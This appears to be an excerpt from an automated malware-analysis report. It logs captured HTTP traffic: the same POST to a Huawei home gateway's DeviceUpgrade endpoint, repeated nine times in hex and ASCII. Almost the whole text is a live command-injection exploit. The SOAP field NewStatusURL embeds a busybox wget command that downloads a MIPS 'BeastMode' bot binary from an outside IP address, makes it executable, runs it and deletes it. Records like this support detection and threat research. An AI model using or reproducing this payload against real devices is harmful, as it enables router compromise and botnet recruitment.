    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
